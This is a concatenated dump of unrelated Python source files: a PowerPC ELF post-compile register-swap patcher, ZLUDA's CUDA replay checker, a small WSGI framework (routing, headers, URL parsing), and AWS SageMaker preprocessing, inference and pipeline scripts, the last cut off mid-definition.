frozenset([23, 29, 28, 31, 30]): (6, 11, 16, 21)
}
}
# lower 5 bits of the 10-bit extension field for instructions with opcode 59
op59_mask5_map = {
'mask': 0x1f,
'data':
{
frozenset([21, 18, 20]): (6, 11, 16),
frozenset([25]): (6, 11, 21),
frozenset([24]): (6, 16),
frozenset([29, 28, 31, 30]): (6, 11, 16, 21)
}
}
# 10-bit extension field for instructions with opcode 4
op4_map = {
'mask': 0x3ff,
'data':
{
frozenset([40, 72, 136, 264]): (6, 16),
frozenset([0, 32, 64, 96, 1014]): (11, 16),
frozenset([528, 560, 592, 624]): (6, 11, 16)
}
}
# lower 6 bits
op4_mask6_map = {
'mask': 0x3f,
'data':
{
frozenset([6, 7, 38, 39]): (6, 11, 16)
}
}
# lower 5 bits
op4_mask5_map = {
'mask': 0x1f,
'data':
{
frozenset([18, 20, 21]): (6, 11, 16),
frozenset([23, 28, 29, 30, 31, 10, 11, 14, 15]): (6, 11, 16, 21),
frozenset([24, 26]): (6, 16),
frozenset([25, 12, 13]): (6, 11, 21)
}
}
# 6-bit opcode field for miscellaneous opcodes
misc_opcode_map = {
'mask': 0x3f,
'data':
{
frozenset([14, 12, 13, 15, 7, 8, 28, 29, 24, 25,
26, 27, 20, 21, 34, 35, 42, 43, 40, 41,
32, 33, 38, 39, 44, 45, 36, 37, 46, 47,
50, 51, 48, 49, 54, 55, 52, 53, 56, 57,
60, 61]): (6, 11),
frozenset([11, 10, 3]): (11,),
frozenset([23]): (6, 11, 16)
}
}
class FloatInfo:
def __init__(self, is_float, int_regs):
self.is_float = is_float
self.int_regs = int_regs
class PPCInstr:
INSTR_SIZE = 32
REG_FIELD_SIZE = 5
def __init__(self, val):
self.v = val
def get_field(self, left, right):
return (self.v >> (self.INSTR_SIZE - right - 1)) & ((1 << (right - left + 1)) - 1)
def set_field(self, left, right, val):
width = right - left + 1
mask = (1 << width) - 1
shift = self.INSTR_SIZE - width - left
self.v = self.v & ~(mask << shift) | ((val & mask) << shift)
def get_opcode(self):
return self.get_field(0, 5)
def get_ext_opcode(self):
return self.get_field(21, 30)
def search_opcode_maps(self, opcode, *maps):
for map in maps:
masked_opcode = opcode & map['mask']
for k in map['data'].keys():
if masked_opcode in k:
return map['data'][k]
# returns a tuple containing the bit position of each register field
# or None if the instruction does not use registers
def get_reg_fields(self):
opcode = self.get_opcode()
ext_opcode = self.get_ext_opcode()
if opcode == 31:
return self.search_opcode_maps(ext_opcode, op31_map, op31_mask9_map)
elif opcode == 59:
return self.search_opcode_maps(ext_opcode, op59_mask5_map)
elif opcode == 63:
return self.search_opcode_maps(ext_opcode, op63_map, op63_mask5_map)
elif opcode == 4:
return self.search_opcode_maps(ext_opcode, op4_map, op4_mask6_map, op4_mask5_map)
else:
return self.search_opcode_maps(opcode, misc_opcode_map)
def uses_float_regs(self):
op = self.get_opcode()
ext_op = self.get_ext_opcode()
if op in {48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 60, 61}:
return FloatInfo(True, (11,))
elif (op == 4 and ext_op & 0x3F in {6, 7, 38, 39}) or (op == 31 and ext_op in {535, 567, 599, 631, 663, 695, 727, 759, 983}):
return FloatInfo(True, (11, 16))
elif op in {4, 59, 63}:
return FloatInfo(True, ())
return FloatInfo(False, ())
# edit the PPC instruction to swap the registers
def swap_registers(self, regA, regB):
info = self.uses_float_regs()
reg_fields = self.get_reg_fields()
if not reg_fields:
return
for left in reg_fields:
right = left + self.REG_FIELD_SIZE - 1
currReg = self.get_field(left, right)
# since r0-r31 occupy 0-31 and f0-31 occupy 32-63,
# subtract 32 from regA/regB if the next register field is for a floating point register
dec = 0 if not info.is_float or left in info.int_regs else -32
if currReg == regA + dec:
self.set_field(left, right, regB + dec)
elif currReg == regB + dec:
self.set_field(left, right, regA + dec)
parser = argparse.ArgumentParser()
parser.add_argument("cc",
help="path to a C/C++ compiler")
parser.add_argument("cflags",
help="all flags and options to be invoked with cc")
parser.add_argument("output",
help="path to the outputted object file")
parser.add_argument("source",
help="path to the C/C++ source file")
args = parser.parse_args()
def parse_reg(str):
if str[0] == 'r' or str[0] == 'f':
reg = int(str[1:])
if reg >= 0 and reg <= 31:
return reg if str[0] == 'r' else reg + 32
raise ValueError("Failed to parse register argument (can be r0...r31 or f0...f31)")
class RegswapTask:
def __init__(self, start, end, regA, regB):
self.start = start # .text section byte offset
self.end = end # .text section byte offset
self.regA = regA
self.regB = regB
class IswapTask:
def __init__(self, src, dst):
self.src = src # .text section byte offset
self.dst = dst # .text section byte offset
regswap_tasks = []
iswap_tasks = []
with open(args.source, "r") as src:
regswap_pattern = re.compile("[ \t]*#pragma[ \t]+regswap[ \t]+")
iswap_pattern = re.compile("[ \t]*#pragma[ \t]+iswap[ \t]+")
for line in src:
if regswap_pattern.match(line):
params = line.split()[2:]
if len(params) != 5:
raise ValueError("ERROR: " + str(len(params)) + " arguments passed to #pragma regswap (expected 5)")
start = int(params[0], base=16)
end = int(params[1], base=16)
regA = parse_reg(params[2])
regB = parse_reg(params[3])
start_file = int(params[4], base=16)
if not (start % 4 == 0 and end % 4 == 0 and start_file % 4 == 0):
raise ValueError("Invalid start, end, or start_file arguments (should have 4 byte aligment)")
if not (start >= start_file and end > start):
raise ValueError("Invalid start, end, or start_file arguments (end must be > start, and start >= start_file)")
regswap_tasks.append(RegswapTask(start-start_file, end-start_file, regA, regB))
elif iswap_pattern.match(line):
params = line.split()[2:]
if len(params) != 3:
raise ValueError("ERROR: " + str(len(params)) + " arguments passed to #pragma iswap (expected 3)")
src = int(params[0], base=16)
dst = int(params[1], base=16)
start_file = int(params[2], base=16)
if not (src % 4 == 0 and dst % 4 == 0 and start_file % 4 == 0):
raise ValueError("Invalid src, dst, or start_file arguments (should have 4 byte aligment)")
if not (src >= start_file and dst > src):
raise ValueError("Invalid src, dst, or start_file arguments (dst must be > src, and src >= start_file)")
iswap_tasks.append(IswapTask(src-start_file, dst-start_file))
subprocess.run([*args.cc.strip().split(' '), *args.cflags.split(' '), "-o", args.output, args.source])
instrs = []
TEXT_INDEX = 1 # NOTE: assumes that mwcceppc always places the .text section header at index 1
SHDR_32_SIZE = 40 # size of an Elf32_Shdr object
if regswap_tasks or iswap_tasks:
with open(args.output, "rb") as f:
if f.read(7) != b'\x7FELF\x01\x02\x01':
raise ValueError("compiler output is not an current version ELF file for a 32-bit big endian architecture")
f.seek(0x20)
e_shoff = int.from_bytes(f.read(4), byteorder='big')
f.seek(0x30)
e_shnum = int.from_bytes(f.read(2), byteorder='big')
if e_shoff == 0 or e_shnum < 2:
raise ValueError("ELF file must contain at least two sections")
# get .text section sh_offset and sh_size members
f.seek(e_shoff + TEXT_INDEX*SHDR_32_SIZE + 0x10)
text_offset = int.from_bytes(f.read(4), byteorder='big')
text_size = int.from_bytes(f.read(4), byteorder='big')
# read .text section contents into buffer
f.seek(text_offset)
for i in range(text_size // 4):
instrs.append(PPCInstr(int.from_bytes(f.read(4), byteorder='big')))
# perform regswap tasks
for task in regswap_tasks:
if task.end > text_size:
raise ValueError("End address " + (task.end + start_file) + " is past the end of the ELF file's .text section")
for i in range(task.start // 4, task.end // 4):
instrs[i].swap_registers(task.regA, task.regB)
# perform iswap tasks
for task in iswap_tasks:
if task.dst > text_size:
raise ValueError("End address " + (task.dst + start_file) + " is past the end of the ELF file's .text section")
a = task.src // 4
b = task.dst // 4
instrs[a], instrs[b] = instrs[b], instrs[a]
# write patched .text section back to the ELF
with open(args.output, "rb+") as f:
f.seek(text_offset)
for instr in instrs:
f.write(instr.v.to_bytes(4, byteorder='big'))
|
Massendefekt/ZLUDA | zluda_dump/src/replay.py | <reponame>Massendefekt/ZLUDA<filename>zluda_dump/src/replay.py
import pycuda.autoinit
import pycuda.driver as drv
import pycuda.tools as py_tools
from pathlib import PurePath
import numpy as np
from os import path
import os
import itertools
import sys
# It's impossible to discern what is the type of a buffer, here you can override equality checks
def assert_array_equal_override(kernel_name, idx, arr1, arr2):
if kernel_name == 'knn_match' and idx == 6:
arr1_view = np.frombuffer(arr1, dtype=np.dtype([('f1', np.uint32), ('f2', np.uint32), ('f3', np.uint32)]))
np.ndarray.sort(arr1_view)
arr2_view = np.frombuffer(arr2, dtype=np.dtype([('f1', np.uint32), ('f2', np.uint32), ('f3', np.uint32)]))
np.ndarray.sort(arr2_view)
if kernel_name == 'nonmax_suppression' and idx == 7:
arr1_view = np.frombuffer(arr1, dtype=np.dtype(np.uint32))
np.ndarray.sort(arr1_view)
arr2_view = np.frombuffer(arr2, dtype=np.dtype(np.uint32))
np.ndarray.sort(arr2_view)
np.testing.assert_array_equal(arr1, arr2)
def load_arguments(arg_path):
is_buffer = arg_path.endswith(".buffer")
with open(arg_path, "rb") as f:
arg_bytes = f.read()
if not is_buffer:
if len(arg_bytes) == 1:
return np.frombuffer(arg_bytes, dtype=np.uint8)[0], None
elif len(arg_bytes) == 2:
return np.frombuffer(arg_bytes, dtype=np.uint16)[0], None
elif len(arg_bytes) == 4:
return np.frombuffer(arg_bytes, dtype=np.uint32)[0], None
elif len(arg_bytes) == 8:
return np.frombuffer(arg_bytes, dtype=np.uint64)[0], None
else:
raise Exception('Incorrect size of {}: {}'.format(arg_path, len(arg_bytes)))
else:
buff = np.frombuffer(bytearray(arg_bytes), dtype=np.uint8)
buff.setflags(write=1, align=1)
return drv.InOut(buff), buff
def parse_arguments(dump_path, prefix):
dir = path.join(dump_path, prefix)
arg_files = os.listdir(dir)
return [load_arguments(path.join(dir, f)) for f in sorted(arg_files)]
def append_debug_buffer(args):
args = list(args)
debug_buff = np.zeros(1024 * 1024, np.single)
args.append((drv.InOut(debug_buff), debug_buff))
return args
def verify_single_dump(input_path, max_block_threads):
print(input_path)
kernel_name = path.basename(input_path).split("_", 1)[1]
with open(path.join(input_path, "launch.txt"), "r") as launch_f:
launch_lines = list(map(int, launch_f.readlines()))
block = tuple(launch_lines[3:6])
launch_block_size = block[0] * block[1] * block[2]
if launch_block_size > max_block_threads:
print(
f" Skipping, launch block size ({launch_block_size}) bigger than maximum block size ({max_block_threads})")
return
module = drv.module_from_file(path.join(input_path, "module.ptx"))
kernel = module.get_function(kernel_name)
pre_args = append_debug_buffer(parse_arguments(input_path, "pre"))
kernel_pre_args, host_pre_args = zip(*pre_args)
kernel(*list(kernel_pre_args), grid=tuple(launch_lines[:3]), block=block, shared=launch_lines[6])
post_args = parse_arguments(input_path, "post")
_, host_post_args_args = zip(*post_args)
for idx, (pre_arg, post_arg) in enumerate(zip(host_pre_args, host_post_args_args)):
if pre_arg is None:
continue
try:
assert_array_equal_override(kernel_name, idx, pre_arg, post_arg)
except Exception as e:
print(f"{idx}: {e}")
def main(argv):
device = drv.Device(0)
max_threads = device.get_attribute(drv.device_attribute.MAX_THREADS_PER_BLOCK)
print(device.name())
input_path = argv[1]
if os.path.exists(path.join(input_path, "launch.txt")):
verify_single_dump(input_path, max_threads)
else:
for input_subdir in sorted([path.join(input_path, dir_name) for dir_name in os.listdir(input_path)]):
verify_single_dump(input_subdir, max_threads)
if __name__ == "__main__":
main(sys.argv)
|
zhaoy17/pyweb | pyweb/routing/router.py | <reponame>zhaoy17/pyweb<filename>pyweb/routing/router.py
from ..http import httpRequest
class Router:
def __init__(self, root_object):
self.root_object = root_object
self.has_arg = None
def _find_object(self, object_location):
curr = self.root_object
for i in range(len(object_location)):
if i < len(object_location) - 1:
try:
curr = getattr(curr, object_location[i])
except AttributeError:
raise ValueError("Resource cannot be located")
else:
try:
curr = getattr(curr, object_location[i])
if not hasattr(curr, "__call__"):
raise ValueError("Resource cannot be located")
self.has_arg = False
return curr
except AttributeError:
self.has_arg = True
return curr
def execute_request(self, request: httpRequest) -> dict:
target = self._find_object(request.object_location)
if self.has_arg is not None:
func = getattr(target, "do_" + request.method.lower())
return func(request.object_location[-1], request.query_string)
else:
return target()
|
zhaoy17/pyweb | pyweb/http/header.py | <reponame>zhaoy17/pyweb
"""
This module consists of functions that are used to parse multipart and discrete
MIME header.
"""
from abc import ABC, abstractmethod
import json
__all__ = [
"ContentType",
"Header",
"HTTPBody"
]
class Header(ABC):
@abstractmethod
def to_str(self) -> str:
pass
@abstractmethod
def to_dict(self) -> dict:
pass
@abstractmethod
def __bool__(self):
pass
@abstractmethod
def to_header(self) -> str:
pass
@abstractmethod
def to_list(self) -> list:
pass
class ContentType(Header):
class Handler(ABC):
@abstractmethod
def parse(self):
pass
@staticmethod
@abstractmethod
def content_type() -> list:
pass
class JSONHandler(Handler):
def __init__(self, raw_string: str):
self._str = raw_string
self._dict = None
def to_str(self) -> str:
return self._str
def parse(self) -> dict:
if self._dict is None:
self._dict = json.loads(self._str)
return self._dict
@staticmethod
def content_type() -> list:
return ["application/json"]
_HandlerMap = {"application/json": JSONHandler}
def __init__(self, raw_header):
self._raw = raw_header
self._str = None
self._dict = None
self._bool = None
self._list = None
def to_header(self):
return self._raw
def to_str(self) -> str:
if not self:
return ""
if self._str is None:
self._str = self._raw.split(";")[0]
return self._str
def to_dict(self) -> dict:
if not self:
return {}
if self._dict is None:
if self._list is None:
self._list = self._parse_content_type(self._str)
content = self._list[0]
params = self._list[1]
params["type"] = content
self._dict = params
return self._dict
def __bool__(self):
return self._str != ""
def to_list(self):
if not self:
return None
if self._dict is None:
self.to_dict()
return self._dict.keys()
@classmethod
def from_dict(cls, content_type: dict):
charset = "utf-8"
if "charset" in content_type:
charset = content_type["charset"]
raw_header = content_type["type"] + "; " + charset
for key in content_type:
if key != "charset":
raw_header += "; " + content_type[key]
return cls(raw_header)
def get_handler(self, raw_string: str) -> Handler:
content_type = self.to_str()
try:
return ContentType._HandlerMap[content_type](raw_string)
except KeyError:
raise ValueError("Header type not supported")
@staticmethod
def add_handler(handler: Handler):
for _t in handler.content_type():
ContentType._HandlerMap[_t] = handler
@staticmethod
def _parse_content_type(line: str) -> list:
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
if line == "":
return ["", {}]
parts = line.split(";")
file_type_header = parts[0].lower().strip()
content = file_type_header
params = {}
if len(parts) > 1:
for i in range(1, len(parts)):
kv = parts[i].split("=")
if len(kv) != 2:
raise ValueError("content-type header is not formatted correctly")
else:
params[kv[0].strip()] = kv[1].strip()
return [content, params]
class HTTPBody:
def __init__(self, stream, content_type: ContentType, content_length: int):
self._content_type = content_type
self._input = stream
try:
self._encoding = content_type.to_dict()["charset"]
except KeyError:
self._encoding = "utf-8"
self._handler = None
self._data = None
self._str = None
self._output = None
self._size = content_length
def get_bytes(self):
if self._data is None:
self._data = self._input.read(self._size)
return self._data
def get_str(self):
if self._str is None:
self._str = self.get_bytes().decode(self._encoding)
return self._str
def parse_content(self):
if self._output is None:
if self._handler is None:
self._handler = self._content_type.get_handler(self.get_str())
self._output = self._handler.parse()
return self._output
|
zhaoy17/pyweb | pyweb/http/_url.py | <filename>pyweb/http/_url.py
"""
This module provides utilities for parsing url string. Most of the implementation is based
on Python's urllib module with some slight modification. The incoming url is processed as
str, while the url consists in the outgoing url request will be processed using ASCII bytearray
"""
import re
from typing import Union
__all__ = [
'to_string',
'to_byte_array',
'parse_query_string',
'decode',
'encode',
'parse_host',
'parse_path_info'
]
# reserved and unreserved chracter defined under the RFC 3986 (STD66): "Uniform Resource Identifiers" by <NAME>,
# <NAME> and L. Masinter, January 2005.
_ALPHA = frozenset(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
_DIGIT = frozenset(b"0123456789")
_GEN_DELIMS = frozenset(b":/?#[]@")
_SUB_DELIMS = frozenset(b"!$&'()*+,;=")
_UNRESERVED = _ALPHA | _DIGIT | frozenset(b"-._~")
_RESERVED = _GEN_DELIMS | _SUB_DELIMS
_reg_hex = None
_reg_host = None
# lookup tables
_BYTE2HEX = {}
_HEX2BYTE = {}
def _urldecode(string: str) -> str:
"""
convert an % + hexadecimal representation encoding into the its original character
:param string: a % + hexadecimal encoded string
:return: the original character
"""
global _HEX2BYTE
if str == "+":
return " "
string = string.lstrip('%')
try:
return _HEX2BYTE[string]
except KeyError:
_HEX2BYTE[string] = chr(int(string, 16))
return _urldecode(string)
def _urlencode(char: int) -> bytearray:
"""
convert an unsafe character into % + hexadecimal representation of that character
:param char: a character represented as an int
:return: % + hexadecimal representation of the character if the character is
not safe
"""
global _BYTE2HEX
if char not in _UNRESERVED:
try:
return _BYTE2HEX[char]
except KeyError:
_BYTE2HEX[char] = to_byte_array('%{:02X}'.format(char))
return _urlencode(char)
else:
return bytearray([char])
def to_byte_array(string: str) -> bytearray:
"""
convert a string into a byte list. Skip all characters that are not in the range
of ISO/IEC 8859-1 character set to avoid undefined behavior
According to PEP3333, "Native" strings (which are always implemented using the type named str)
that are used for request/response headers and metadata". The content content of native strings
must be translatable to bytes via the Latin-1 encoding. HTTP does not support unicode.
"""
byte_array = bytearray()
for char in string:
if ord(char) >= 256:
continue
else:
byte_array.append(ord(char))
return byte_array
def to_string(byte_array: Union[bytes, bytearray]) -> str:
"""
convert a byte array into string
:param byte_array: a latin1 encoded byte array
:return: a decoded string
"""
string = []
for byte in byte_array:
string.append(chr(byte))
return "".join(string)
def encode(url: Union[str, bytes, bytearray]) -> bytearray:
"""
Encode all characters in an url that does not belong to unreserved set of character into
%hex representation of that character.
:param url: a url byte array
:return: url with unsafe character encoded using % + hex(chr)
"""
if isinstance(url, str):
url = to_byte_array(url)
if isinstance(url, str):
url = to_byte_array(url)
return bytearray(b''.join([_urlencode(char) for char in url]))
def decode(string: Union[str, bytes, bytearray]) -> str:
"""
decode a % encoded url into its original form
:param string: a % encoded url string
:return: unencoded url string
"""
if isinstance(string, bytes) or isinstance(string, bytearray):
string = to_string(string)
if "%" not in string and "+" not in string:
return string
else:
global _reg_hex
if _reg_hex is None:
_reg_hex = re.compile("(%[0-f][0-f])")
string_list = _reg_hex.split(string)
for index, item in enumerate(string_list):
if len(item) > 0 and item[0] == "%":
string_list[index] = _urldecode(item)
return ''.join(string_list)
def parse_query_string(query: str) -> dict:
"""
parse a query string portion of an url (the part after "?") into a key-value pairs,
skip empty query string
:param query: a raw query string
:return: key-value pairs with parameter and its value
"""
pairs = query.split("&")
kv = {}
for item in pairs:
key_value = item.split("=")
# skip empty query string
if len(key_value) == 1:
continue
elif len(key_value) != 2:
raise ValueError("bad query field: {}".format(key_value))
kv[decode(key_value[0].strip())] = decode(key_value[1].strip())
return kv
def parse_path_info(string: str) -> list:
"""
parse the path info, which will be used to find modules requested by the url
:param string: the path info string
:return: a list of directory split by "/"
"""
string = decode(string.lstrip("/"))
return string.split("/")
def parse_host(host: str) -> tuple:
"""
Implementation comes from urllib. Parse a canonical 'host:port' string into parts.
Parse a host string (which may or may not contain a port) into
parts, taking into account that the string may contain
either a domain name or an IP address. In the latter case,
both IPv4 and IPv6 addresses are supported.
:param host: the content of the host header
:return: host name and port number
"""
global _reg_host
if _reg_host is None:
_reg_host = re.compile("(.*):([0-9]*)", re.DOTALL)
match = _reg_host.fullmatch(host)
if match:
host, port = match.groups()
if port:
return host, int(port)
return host, None
|
zhaoy17/pyweb | pyweb/http/httpRequest.py | <filename>pyweb/http/httpRequest.py
from ._url import parse_query_string, parse_host, parse_path_info, decode
from .header import ContentType, HTTPBody
class BaseRequest:
def __init__(self, environ):
self._env = environ
self._method = environ["REQUEST_METHOD"]
try:
self._pathinfo = environ["PATH_INFO"]
except KeyError:
self._pathinfo = "/"
self._wsgi_error = environ["wsgi.errors"]
self._stream = environ["wsgi.input"]
self._host = None
self._port = None
self._path = None
self._content_type = None
self._query_string = None
@property
def method(self):
return self._method
@property
def port(self):
"""
infer the port number of the request; HTTP_HOST should be preferred over
SEVER_NAME and SEVER_PORT variable according to PEP3333
:return: the port number of the request as int
"""
if self._port is None:
try:
host, port = parse_host(self._env['HTTP_HOST'])
self._host = host
if port is None:
self._port = 443 if self._env['wsgi.url_scheme'] == 'https' else 80
except KeyError:
self._host = self._env['SERVER_NAME']
self._port = self._env['SERVER_PORT']
return self._port
@property
def host(self) -> str:
if self._host is None:
self.port()
return self._host
@property
def path(self) -> list:
if self._path is None:
self._path = parse_path_info(self._pathinfo)
return self._path
@property
def query_string(self) -> dict:
if self._query_string is None:
try:
raw_string = self._env["QUERY_STRING"] \
.encode("latin1").decode("utf-8", "replace")
except KeyError:
raw_string = ""
self._query_string = parse_query_string(raw_string)
return self._query_string
@property
def content_type(self) -> ContentType:
if self.method == "GET":
return ContentType("")
if self._content_type is None:
try:
header = decode(self._env["CONTENT_TYPE"]
.encode("latin1").decode("utf-8", "replace"))
except KeyError:
header = ""
self._content_type = ContentType(header)
return self._content_type
@property
def content_length(self) -> int:
try:
return self._env['CONTENT_LENGTH']
except KeyError:
return 0
@property
def message_body(self) -> HTTPBody:
return HTTPBody(self._stream, self.content_type, self.content_length)
|
Niobiumkey/amazon-sagemaker-build-train-deploy | 02_data_exploration_and_feature_eng/source_dir/preprocessor.py | import argparse
import os
import warnings
import subprocess
subprocess.call(['pip', 'install', 'sagemaker-experiments'])
import pandas as pd
import numpy as np
import tarfile
from smexperiments.tracker import Tracker
from sklearn.externals import joblib
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.exceptions import DataConversionWarning
warnings.filterwarnings(action='ignore', category=DataConversionWarning)
columns = ['Type', 'Air temperature [K]', 'Process temperature [K]', 'Rotational speed [rpm]', 'Torque [Nm]', 'Tool wear [min]', 'Machine failure']
cat_columns = ['Type']
num_columns = ['Air temperature [K]', 'Process temperature [K]', 'Rotational speed [rpm]', 'Torque [Nm]', 'Tool wear [min]']
target_column = 'Machine failure'
if __name__=='__main__':
# Read the arguments passed to the script.
parser = argparse.ArgumentParser()
parser.add_argument('--train-test-split-ratio', type=float, default=0.3)
args, _ = parser.parse_known_args()
# Tracking specific parameter value during job.
tracker = Tracker.load()
tracker.log_parameter('train-test-split-ratio', args.train_test_split_ratio)
print('Received arguments {}'.format(args))
# Read input data into a Pandas dataframe.
input_data_path = os.path.join('/opt/ml/processing/input', 'predmain_raw_data_header.csv')
print('Reading input data from {}'.format(input_data_path))
df = pd.read_csv(input_data_path, usecols=columns)
X = df.drop(target_column, axis=1)
y = df[target_column]
# Splitting.
split_ratio = args.train_test_split_ratio
print('Splitting data into train and validation sets with ratio {}'.format(split_ratio))
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=split_ratio,
random_state=0,
stratify=y)
transformer = ColumnTransformer(transformers=[('numeric', StandardScaler(), num_columns),
('categorical', OneHotEncoder(), cat_columns)],
remainder='passthrough')
featurizer_model = transformer.fit(X_train)
X_train = featurizer_model.transform(X_train)
X_val = featurizer_model.transform(X_val)
print('Train features shape after preprocessing: {}'.format(X_train.shape))
print('Train labels shape after preprocessing: {}'.format(y_train.shape))
print('Validation features shape after preprocessing: {}'.format(X_val.shape))
print('Validation labels shape after preprocessing: {}'.format(y_val.shape))
# Saving outputs.
train_features_output_path = os.path.join('/opt/ml/processing/train', 'train_features.csv')
train_labels_output_path = os.path.join('/opt/ml/processing/train', 'train_labels.csv')
val_features_output_path = os.path.join('/opt/ml/processing/val', 'val_features.csv')
val_labels_output_path = os.path.join('/opt/ml/processing/val', 'val_labels.csv')
print('Saving training features to {}'.format(train_features_output_path))
pd.DataFrame(X_train).to_csv(train_features_output_path, header=False, index=False)
print('Saving validation features to {}'.format(val_features_output_path))
pd.DataFrame(X_val).to_csv(val_features_output_path, header=False, index=False)
print('Saving training labels to {}'.format(train_labels_output_path))
pd.DataFrame(y_train).to_csv(train_labels_output_path, header=False, index=False)
print('Saving validation labels to {}'.format(val_labels_output_path))
pd.DataFrame(y_val).to_csv(val_labels_output_path, header=False, index=False)
# Saving model.
model_path = os.path.join('/opt/ml/processing/model', 'model.joblib')
model_output_path = os.path.join('/opt/ml/processing/model', 'model.tar.gz')
print('Saving featurizer model to {}'.format(model_output_path))
joblib.dump(featurizer_model, model_path)
tar = tarfile.open(model_output_path, "w:gz")
tar.add(model_path, arcname="model.joblib")
tar.close()
tracker.close()
|
Niobiumkey/amazon-sagemaker-build-train-deploy | 04_deploy_model/sklearn_source_dir/inference.py | from __future__ import print_function
import sys
from io import StringIO
import os
import csv
import json
import numpy as np
import pandas as pd
from sklearn.externals import joblib
from sagemaker_containers.beta.framework import (
content_types, encoders, env, modules, transformer, worker)
feature_columns_names = ['Type', 'Air temperature [K]', 'Process temperature [K]', 'Rotational speed [rpm]', 'Torque [Nm]', 'Tool wear [min]']
def input_fn(input_data, content_type):
print(input_data)
if content_type == 'text/csv':
df = pd.read_csv(StringIO(input_data), header=None)
if len(df.columns) == len(feature_columns_names):
df.columns = feature_columns_names
return df
else:
raise ValueError("{} not supported by script!".format(content_type))
def predict_fn(input_data, model):
features = model.transform(input_data)
return features
def output_fn(prediction, accept):
if accept == "application/json":
instances = []
for row in prediction.tolist():
instances.append({"features": row})
json_output = {"instances": instances}
return worker.Response(json.dumps(json_output), mimetype=accept)
elif accept == 'text/csv':
return worker.Response(encoders.encode(prediction, accept), mimetype=accept)
else:
raise RuntimeException("{} accept type is not supported.".format(accept))
def model_fn(model_dir):
preprocessor = joblib.load(os.path.join(model_dir, "model.joblib"))
return preprocessor
|
Niobiumkey/amazon-sagemaker-build-train-deploy | 08_projects/modelbuild/pipelines/endtoendmlsm/workflow.py | import os
import time
import boto3
import sagemaker
from sagemaker.processing import ProcessingInput, ProcessingOutput
from sagemaker.sklearn.processing import SKLearnProcessor
from sagemaker.sklearn import SKLearnModel
from sagemaker.inputs import TrainingInput
from sagemaker.xgboost import XGBoost
from sagemaker.xgboost import XGBoostModel
from sagemaker.pipeline import PipelineModel
from sagemaker.workflow.parameters import (
ParameterInteger,
ParameterString,
)
from sagemaker.workflow.steps import (
ProcessingStep,
TrainingStep
)
from sagemaker.workflow.step_collections import RegisterModel
from sagemaker.workflow.pipeline import Pipeline
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
def get_sagemaker_client(region):
boto_session = boto3.Session(region_name=region)
sagemaker_client = boto_session.client("sagemaker")
return sagemaker_client
def get_pipeline_custom_tags(new_tags, region, sagemaker_project_arn=None):
try:
sm_client = get_sagemaker_client(region)
response = sm_client.list_tags(
ResourceArn=sagemaker_project_arn)
project_tags = response["Tags"]
for project_tag in project_tags:
new_tags.append(project_tag)
except Exception as e:
print(f"Error getting project tags: {e}")
return new_tags
def get_session(region, default_bucket):
boto_session = boto3.Session(region_name=region)
sagemaker_client = boto_session.client("sagemaker")
runtime_client = boto_session.client("sagemaker-runtime")
return sagemaker.session.Session(
boto_session=boto_session,
sagemaker_client=sagemaker_client,
sagemaker_runtime_client=runtime_client,
default_bucket=default_bucket,
)
def get_pipeline(region,
sagemaker_project_arn=None,
role=None,
default_bucket='',
pipeline_name='end-to-end-ml-sagemaker-pipeline',
model_package_group_name='end-to-end-ml-sm-model-package-group',
base_job_prefix='endtoendmlsm') -> Pipeline:
"""
Gets the SM Pipeline.
:param role: The execution role.
:param bucket_name: The bucket where pipeline artifacts are stored.
:param prefix: The prefix where pipeline artifacts are stored.
:return: A Pipeline instance.
"""
bucket_name = default_bucket
prefix = 'endtoendmlsm'
sagemaker_session = get_session(region, bucket_name)
# ---------------------
# Processing parameters
# ---------------------
# The path to the raw data.
raw_data_path = 's3://gianpo-public/endtoendml/data/raw/predmain_raw_data_header.csv'.format(bucket_name, prefix)
raw_data_path_param = ParameterString(name="raw_data_path", default_value=raw_data_path)
# The output path to the training data.
train_data_path = 's3://{0}/{1}/data/preprocessed/train/'.format(bucket_name, prefix)
train_data_path_param = ParameterString(name="train_data_path", default_value=train_data_path)
# The output path to the validation data.
val_data_path = 's3://{0}/{1}/data/preprocessed/val/'.format(bucket_name, prefix)
val_data_path_param = ParameterString(name="val_data_path", default_value=val_data_path)
# The output path to the featurizer model.
model_path = 's3://{0}/{1}/output/sklearn/'.format(bucket_name, prefix)
model_path_param = ParameterString(name="model_path", default_value=model_path)
# The instance type for the processing job.
processing_instance_type_param = ParameterString(name="processing_instance_type", default_value='ml.m5.large')
# The instance count for the processing job.
processing_instance_count_param = ParameterInteger(name="processing_instance_count", default_value=1)
# The train/test split ration parameter.
train_test_split_ratio_param = ParameterString(name="train_test_split_ratio", default_value='0.2')
# -------------------
# Training parameters
# -------------------
# XGB hyperparameters.
max_depth_param = ParameterString(name="max_depth", default_value='3')
eta_param = ParameterString(name="eta", default_value='0.1')
gamma_param = ParameterString(name="gamma", default_value='0')
min_child_weight_param = ParameterString(name="min_child_weight", default_value='1')
objective_param = ParameterString(name="objective", default_value='binary:logistic')
num_round_param = ParameterString(name="num_round", default_value='10')
eval_metric_param = ParameterString(name="eval_metric", default_value='auc')
# The instance type for the training job.
training_instance_type_param = ParameterString(name="training_instance_type", default_value='ml.m5.xlarge')
# The instance count for the training job.
training_instance_count_param = ParameterInteger(name="training_instance_count", default_value=1)
# The training output path for the model.
output_path = 's3://{0}/{1}/output/'.format(bucket_name, prefix)
output_path_param = ParameterString(name="output_path", default_value=output_path)
# --------------------------
# Register model parameters
# --------------------------
# The default instance type for deployment.
deploy_instance_type_param = ParameterString(name="deploy_instance_type", default_value='ml.m5.2xlarge')
# The approval status for models added to the registry.
model_approval_status_param = ParameterString(name="model_approval_status", default_value='PendingManualApproval')
# --------------------------
# Processing Step
# --------------------------
sklearn_processor = SKLearnProcessor(role=role,
instance_type=processing_instance_type_param,
instance_count=processing_instance_count_param,
framework_version='0.20.0')
inputs = [ProcessingInput(input_name='raw_data',
source=raw_data_path_param, destination='/opt/ml/processing/input')]
outputs = [ProcessingOutput(output_name='train_data',
source='/opt/ml/processing/train', destination=train_data_path_param),
ProcessingOutput(output_name='val_data',
source='/opt/ml/processing/val', destination=val_data_path_param),
ProcessingOutput(output_name='model',
